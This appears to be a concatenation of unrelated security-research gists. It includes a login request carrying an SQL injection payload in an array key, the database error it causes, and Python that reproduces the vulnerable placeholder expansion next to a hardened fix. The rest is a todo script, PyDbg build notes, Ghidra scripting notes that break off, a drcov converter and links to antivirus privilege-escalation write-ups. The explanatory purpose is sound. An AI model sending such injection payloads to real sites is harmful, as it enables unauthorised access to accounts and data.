I hereby claim:
- I am v-p-b on github.
- I am buherator (https://keybase.io/buherator) on keybase.
- I have a public key whose fingerprint is 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
To claim this, I am signing this object:
Request body (the name[] parameter is sent as an array whose key carries the payload):

name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in

Resulting error (the array key has become part of the placeholder name, and so of the SQL text; the token oxr is not valid SQL, so the server answers with a syntax error that echoes the injected text instead of executing it):

PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'oxr 1=1 -- , 'admin' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array
(
    [:name_0 oxr 1=1 -- ] => admin
    [:name_0] => admin
)
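The request and error above show client-controlled array keys being copied into prepared-statement placeholder names. The following added example (my own Python, not from the gist and not the application's code) re-implements that expansion step so that the quoted query is reproduced from a request body, and sets a hardened variant beside it that names placeholders by position so the client's keys never reach the SQL. The request body is constructed to match the one above (with a single space in the key so the output matches the error text); parse_form, expand_vulnerable, expand_hardened, login_query and placeholders_are_clean are names chosen here.

```python
import re
from urllib.parse import unquote_plus

# Constructed request body shaped like the login POST quoted above.
BODY = ("name[0%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test"
        "&form_id=user_login_block&op=Log+in")

# The login query exactly as the error message shows it before expansion.
QUERY = "SELECT * FROM {users} WHERE name = :name AND status = 1"


def parse_form(body):
    """PHP-style form decoding: 'a[b]=v' becomes {'a': {'b': 'v'}}, in
    arrival order. One bracket level is enough for this demonstration."""
    args = {}
    for pair in body.split("&"):
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            args.setdefault(m.group(1), {})[m.group(2)] = val
        else:
            args[key] = val
    return args


def _expand(query, args, naming):
    """Expand every array-valued placeholder into one placeholder per
    element. `naming(key, position)` decides the suffix of each new
    placeholder; the joined names are spliced into the query text."""
    args = dict(args)
    for key, data in list(args.items()):
        if isinstance(data, dict):
            new_keys = {key + "_" + naming(k, pos): v
                        for pos, (k, v) in enumerate(data.items())}
            query = re.sub(re.escape(key) + r"\b",
                           lambda _m: ", ".join(new_keys), query)
            del args[key]
            args.update(new_keys)
    return query, args


def expand_vulnerable(query, args):
    """Name new placeholders after the element's KEY: the key is client
    controlled, so whatever was sent in name[...] ends up in the SQL."""
    return _expand(query, args, lambda key, position: key)


def expand_hardened(query, args):
    """Name new placeholders by POSITION (0, 1, ...): keys never reach the
    query and the values stay bound parameters."""
    return _expand(query, args, lambda key, position: str(position))


def login_query(body, expander):
    """What the login handler ends up executing for a given POST body."""
    form = parse_form(body)
    return expander(QUERY, {":name": form["name"]})


def placeholders_are_clean(args):
    """Defensive check: every bound placeholder name must be :identifier."""
    return all(re.fullmatch(r":\w+", name) for name in args)


if __name__ == "__main__":
    for expander in (expand_vulnerable, expand_hardened):
        query, args = login_query(BODY, expander)
        print(expander.__name__)
        print("  " + query)
        print("  placeholders clean: %s" % placeholders_are_clean(args))
```

The hardened expansion still yields syntactically odd SQL for a `=` comparison fed with two values, but that is an application bug rather than an injection: both values remain bound parameters and the attacker's text never reaches the query string. placeholders_are_clean() is the kind of assertion worth adding to any placeholder-expansion code path.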
#!/bin/bash
# Minimal todo list kept as files under ~/_todo:
#   todo <item>        creates the item
#   todo <item> done   removes it
# Arguments are quoted so items containing spaces work.
if [ -n "$1" ]; then
    if [ "$2" = "done" ]; then
        rm -- ~/_todo/"$1"
    else
        mkdir -p ~/_todo
        touch -- ~/_todo/"$1"
    fi
fi
http://code.google.com/p/paimei/ - As of r253
- You need pydasm, which is included in the libdasm package. v1.5 is fine; you don't want to fight the bugs of the unstable version - http://code.google.com/p/libdasm/
- PyDasm will complain about MSVC scripts, but you don't need those. Install MinGW (with C++ support?) - http://www.mingw.org/
- Add MinGW's bin directory to your PATH, or else it won't find gcc
- Remove the -mno-cygwin parameters from pythonXX\lib\distutils\cygwinccompiler.py and delete the .pyc so it gets recompiled
- setup.py build_ext --compiler=mingw32
- setup.py install may fail. Install the lib by copying the .pyd file from the build directory to PythonXX\Lib\site-packages
- You don't need PaiMei's dependencies to use PyDbg; just build and install with setup.py
- Remove the bundled pydasm.pyd from the PaiMei package
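The steps above can be scripted. The following is an added example (my own, not part of the notes or of the libdasm/PaiMei projects) that patches distutils' cygwinccompiler.py, drops the stale .pyc/.pyo, runs the mingw32 build and copies the resulting .pyd into site-packages by hand. The function names, the backup file suffix and the glob for the build output directory are assumptions made here.

```python
import glob
import os
import re
import shutil
import subprocess
import sys
import sysconfig

FLAG = "-mno-cygwin"


def strip_mno_cygwin(source):
    """Return (patched_text, count): the distutils source with every
    '-mno-cygwin' flag (and the blank preceding it) removed."""
    return re.subn(r"[ \t]*" + re.escape(FLAG) + r"\b", "", source)


def patch_cygwinccompiler(path):
    """Patch <path> in place (keeping a .orig copy) and remove the stale
    compiled files next to it so distutils reloads the edited source."""
    with open(path) as f:
        patched, count = strip_mno_cygwin(f.read())
    if count:
        shutil.copy(path, path + ".orig")  # backup name chosen here
        with open(path, "w") as f:
            f.write(patched)
    for stale in (path + "c", path + "o"):
        if os.path.exists(stale):
            os.remove(stale)
    return count


def build_and_install(pydasm_dir, site_packages):
    """Run the build step from the notes, then copy the .pyd by hand
    because 'setup.py install' may fail on this toolchain."""
    subprocess.check_call(
        [sys.executable, "setup.py", "build_ext", "--compiler=mingw32"],
        cwd=pydasm_dir)
    pyds = glob.glob(os.path.join(pydasm_dir, "build", "lib*", "pydasm*.pyd"))
    if not pyds:
        raise RuntimeError("no pydasm .pyd produced under build/")
    for pyd in pyds:
        shutil.copy(pyd, site_packages)
    return pyds


if __name__ == "__main__":
    # usage: python build_pydasm.py <directory containing pydasm's setup.py>
    paths = sysconfig.get_paths()
    cyg = os.path.join(paths["stdlib"], "distutils", "cygwinccompiler.py")
    print("removed %d flag(s) from %s" % (patch_cygwinccompiler(cyg), cyg))
    print("installed: %s" % build_and_install(sys.argv[1], paths["platlib"]))
```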
My current target uses a deterministic pattern when calling C++ constructors, so I can use the CFG to identify object instantiation. Here are my notes about how to use Ghidra's decompiler to get the sizes of the objects to be created:

We can use the parameter of operator_new() to find the size of the objects. Instead of parsing the instructions of the relevant basic blocks (and hoping that we don't run into some unexpected instruction sequences generated by the compiler) we can use the decompiler to get the association between the call to operator_new() and its parameter.

Ghidra/Features/Decompiler/ghidra_scripts/ShowCCallsScript.java contains a nice example of how to use the Decompiler API. First, an instance of DecompInterface must be created, as shown in setUpDecompiler(). Note that this method doesn't call openProgram() on the returned DecompInterface object, which is necessary before decompilation can run! The decompileFunction() method works as expected - the returned DecompileResults object con
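As an added example (mine, not from the notes above and not one of Ghidra's bundled scripts), here is a Ghidra Jython script that follows the ShowCCallsScript pattern: create a DecompInterface, bind it with openProgram(), decompile only the callers of the allocator, and read the size argument off the high-pcode CALL op (input 0 is the call target, input 1 the first argument). The allocator names in ALLOCATOR_NAMES, the per-function timeout and all helper names are assumptions made here; constant_sizes() is kept free of Ghidra imports so it can be exercised outside Ghidra.

```python
# Ghidra Jython script: list the size argument of every call to the C++
# allocator that the decompiler resolved to a constant.
# Assumed: the allocator appears under one of ALLOCATOR_NAMES (adjust for
# your target); the 60 s timeout is a choice made here, not a Ghidra default.

ALLOCATOR_NAMES = ("operator_new", "operator.new", "operator new")
DECOMPILE_TIMEOUT_SECS = 60


def constant_sizes(call_ops):
    """For decompiler CALL ops targeting the allocator, return
    [(call address, size)]; size is None when input 1 (the first argument)
    is not a constant varnode, e.g. because the size is computed at runtime."""
    results = []
    for op in call_ops:
        where = op.getSeqnum().getTarget()
        arg = op.getInput(1) if op.getNumInputs() > 1 else None
        if arg is not None and arg.isConstant():
            results.append((where, arg.getOffset()))
        else:
            results.append((where, None))
    return results


def allocator_functions(program):
    """All functions (thunks included) named like the allocator."""
    fm = program.getFunctionManager()
    return [f for f in fm.getFunctions(True) if f.getName() in ALLOCATOR_NAMES]


def callers_of(program, targets):
    """Functions referencing any target entry point, so only those are
    decompiled instead of the whole program."""
    fm = program.getFunctionManager()
    rm = program.getReferenceManager()
    found = {}
    for target in targets:
        for ref in rm.getReferencesTo(target.getEntryPoint()):
            caller = fm.getFunctionContaining(ref.getFromAddress())
            if caller is not None and not caller.isThunk():
                found[str(caller.getEntryPoint())] = caller
    return list(found.values())


def run(program, monitor):
    from ghidra.app.decompiler import DecompInterface, DecompileOptions
    from ghidra.program.model.pcode import PcodeOp

    targets = allocator_functions(program)
    if not targets:
        print("no function named like the allocator; adjust ALLOCATOR_NAMES")
        return
    target_addrs = set(str(t.getEntryPoint()) for t in targets)

    ifc = DecompInterface()
    ifc.setOptions(DecompileOptions())
    # setUpDecompiler() in ShowCCallsScript stops before this call, but
    # nothing decompiles until the interface is bound to a program.
    if not ifc.openProgram(program):
        print("decompiler failed to open the program")
        return
    try:
        for func in callers_of(program, targets):
            res = ifc.decompileFunction(func, DECOMPILE_TIMEOUT_SECS, monitor)
            if not res.decompileCompleted():
                print("%s: %s" % (func.getName(), res.getErrorMessage()))
                continue
            alloc_calls = []
            for op in res.getHighFunction().getPcodeOps():
                if (op.getOpcode() == PcodeOp.CALL
                        and str(op.getInput(0).getAddress()) in target_addrs):
                    alloc_calls.append(op)
            for where, size in constant_sizes(alloc_calls):
                shown = "0x%x" % size if size is not None else "<not constant>"
                print("%s @ %s: operator_new(%s)" % (func.getName(), where, shown))
    finally:
        ifc.dispose()


try:
    _program = currentProgram  # injected by Ghidra when run as a script
except NameError:
    _program = None            # imported outside Ghidra (e.g. for testing)
if _program is not None:
    run(_program, monitor)
```

Non-constant sizes are reported rather than dropped: a call whose size argument the decompiler could not fold to a constant is exactly the case where an instruction-matching approach would have silently produced a wrong number.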
Install the CodeQL extension and configure the CLI!
This is not strictly mandatory, but you probably want something like this:
#Stupid little script to find identifiable strings referenced from a function or its descendants
#@author buherator
#@category Test
#@keybinding
#@menupath
#@toolbar
from ghidra.util.task import TaskMonitor
from docking.widgets import OptionDialog
from ghidra.program.model.symbol import RefType
import sys
import struct
"""
From debugger trace to Lighthouse
=================================
Converting debugger trace logs to binary drcov format that is good enough for Lighthouse.
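The gist above stops at its docstring. As an added example (mine, not the author's converter), here is a complete converter from a trace log of "address size" lines into a version 2 drcov file: the text header with the module table, then one packed 8-byte record (module offset, size, module id) per basic block, which is the layout Lighthouse's drcov reader expects. The trace lines, the module list, the "address size" log format and the function names are constructed for this example; entry, checksum and timestamp in the module table are zeroed because a plain trace does not carry them.

```python
import struct

# Constructed sample trace (not a real capture): one "start size" pair per
# line, start being the absolute address of a basic block the debugger
# stepped into and size its length in bytes. Assumed log format.
TRACE = """\
0x00401000 6
0x00401000 6
0x00401010 3
0x7c901000 5
0x00401020 2
0xdeadbeef 1
"""

# Constructed module list: (path, base, end) as the debugger reported them.
MODULES = [
    ("C:\\target\\app.exe", 0x00400000, 0x00410000),
    ("C:\\Windows\\system32\\ntdll.dll", 0x7c900000, 0x7c9b0000),
]

BB_STRUCT = struct.Struct("<IHH")  # offset in module, size, module id


def parse_trace(text):
    """Turn the trace log into [(address, size)], skipping malformed lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        entries.append((int(parts[0], 16), int(parts[1], 0)))
    return entries


def to_blocks(entries, modules):
    """Rebase each block onto its module: [(offset, size, module_id)].
    Blocks outside every module are dropped (the 0xdeadbeef line above);
    repeats are kept once, since drcov only records that a block was hit."""
    seen = set()
    blocks = []
    for addr, size in entries:
        for mod_id, (_, base, end) in enumerate(modules):
            if base <= addr < end:
                block = (addr - base, size, mod_id)
                if block not in seen:
                    seen.add(block)
                    blocks.append(block)
                break
    return blocks


def build_drcov(blocks, modules):
    """Serialise a version 2 drcov file: text header, then one packed
    8-byte record per basic block."""
    lines = [
        "DRCOV VERSION: 2",
        "DRCOV FLAVOR: drcov",
        "Module Table: version 2, count %d" % len(modules),
        "Columns: id, base, end, entry, checksum, timestamp, path",
    ]
    for mod_id, (path, base, end) in enumerate(modules):
        # entry, checksum and timestamp are unknown from a plain trace;
        # entry is set to base and the other two to zero.
        lines.append("%3d, 0x%016x, 0x%016x, 0x%016x, 0x00000000, 0x00000000, %s"
                     % (mod_id, base, end, base, path))
    lines.append("BB Table: %d bbs" % len(blocks))
    header = ("\n".join(lines) + "\n").encode("utf-8")
    body = b"".join(BB_STRUCT.pack(*block) for block in blocks)
    return header + body


def read_bb_table(blob):
    """Read the packed records back out of a drcov blob (self-check)."""
    marker = b" bbs\n"
    start = blob.index(marker) + len(marker)
    return [BB_STRUCT.unpack_from(blob, i)
            for i in range(start, len(blob), BB_STRUCT.size)]


if __name__ == "__main__":
    import sys
    out = sys.argv[1] if len(sys.argv) > 1 else "trace.drcov"
    blocks = to_blocks(parse_trace(TRACE), MODULES)
    with open(out, "wb") as f:
        f.write(build_drcov(blocks, MODULES))
    print("wrote %d blocks to %s" % (len(blocks), out))
```

Block sizes matter: Lighthouse maps each record to a function by its start offset, but a zero size hides the block from the coverage painting, so a trace that only logs addresses needs the instruction or block length recorded alongside.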
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html